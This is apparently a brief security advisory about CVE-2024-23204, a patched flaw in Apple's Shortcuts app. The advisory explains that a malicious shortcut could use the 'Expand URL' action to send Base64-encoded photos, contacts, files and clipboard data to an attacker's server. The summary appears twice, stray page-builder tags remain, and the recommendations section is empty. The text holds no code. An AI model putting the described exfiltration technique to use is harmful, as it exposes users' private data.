Summary:
A critical security vulnerability, tracked as CVE-2024-23204 with a CVSS score of 7.5, has been discovered and patched in Apple's Shortcuts app across iOS, iPadOS, macOS, and watchOS. Exploitation of this flaw could enable a maliciously crafted shortcut to access sensitive user data without consent, by leveraging the "Expand URL" action to transmit Base64-encoded data to a remote server. This data, including photos, contacts, files, and clipboard content, could be exfiltrated and stored on an attacker-controlled server, facilitating potential follow-on exploitation. Given the capability of Shortcuts to be exported and shared among users, there exists a significant risk of unwittingly importing and executing malicious shortcuts, thereby extending the reach of this vulnerability and posing a serious threat to user privacy and data security.[/subscribe_to_unlock_form]
Summary:
A critical security vulnerability, tracked as CVE-2024-23204 with a CVSS score of 7.5, has been discovered and patched in Apple's Shortcuts app across iOS, iPadOS, macOS, and watchOS. Exploitation of this flaw could enable a maliciously crafted shortcut to access sensitive user data without consent, by leveraging the "Expand URL" action to transmit Base64-encoded data to a remote server. This data, including photos, contacts, files, and clipboard content, could be exfiltrated and stored on an attacker-controlled server, facilitating potential follow-on exploitation. Given the capability of Shortcuts to be exported and shared among users, there exists a significant risk of unwittingly importing and executing malicious shortcuts, thereby extending the reach of this vulnerability and posing a serious threat to user privacy and data security.[emaillocker id="1283"]
Recommendations:
References:
The following reports contain further technical details:
https://thehackernews.com/2024/02/researchers-detail-apples-recent-zero.html
[/emaillocker]